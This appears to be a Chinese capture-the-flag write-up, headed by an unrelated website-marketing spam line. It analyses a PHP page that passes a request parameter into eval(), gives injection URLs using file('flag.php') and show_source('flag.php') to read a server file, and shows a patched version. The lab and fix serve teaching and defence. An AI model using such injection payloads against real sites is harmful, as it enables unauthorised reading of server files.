南宁制作营销型网站深圳市龙华区
一、原网页:
二、步骤:
1.代码分析:
<?phpinclude "flag.php"; // 引入一个文件,该文件可能定义了一些变量(例如 $flag)$a = @$_REQUEST['hello']; // 从用户请求中获取参数 'hello' 的值,并将其赋值给变量 $a// 使用 @ 抑制错误(如果 'hello' 参数不存在,不会报错)。eval( "var_dump($a);"); // 使用 eval() 执行动态生成的代码,// 将动态解析 $a 的内容,并将其作为 PHP 代码运行// eval() 是一个非常危险的函数,因为它会执行传入的字符串作为代码show_source(__FILE__); // 显示当前 PHP 文件的源代码// 这意味着攻击者可以直接看到整个文件的内容,包括敏感信息(如引入的 // flag.php 文件)
?>2.通过hello参数传入代码:
117.72.52.127:12437/?hello=file('flag.php')
输入结果:
或者:
117.72.52.127:12437/?hello=show_source('flag.php')
输入结果:
三、修复代码漏洞:
源代码:
<?phpinclude "flag.php";$a = @$_REQUEST['hello'];eval( "var_dump($a);");show_source(__FILE__);
?>修复后的代码:
<?phpinclude "flag.php";$a = @$_REQUEST['hello']; if (is_string($a) && preg_match('/^[a-zA-Z0-9_]+$/', $a)) {var_dump($a);} else {echo "Invalid input.";}
?>修复后的代码分析:
<?phpinclude "flag.php";$a = @$_REQUEST['hello'];// 从用户请求中获取参数 'hello' 的值,并进行验证。// 验证 $a 是否为字符串,并且只包含预期的字符(例如字母和数字)。if (is_string($a) && preg_match('/^[a-zA-Z0-9_]+$/', $a)) {var_dump($a);// 安全地输出变量 $a 的值。} else {echo "Invalid input.";}// 不要在生产环境中显示源代码。// show_source(__FILE__); // 已移除
?>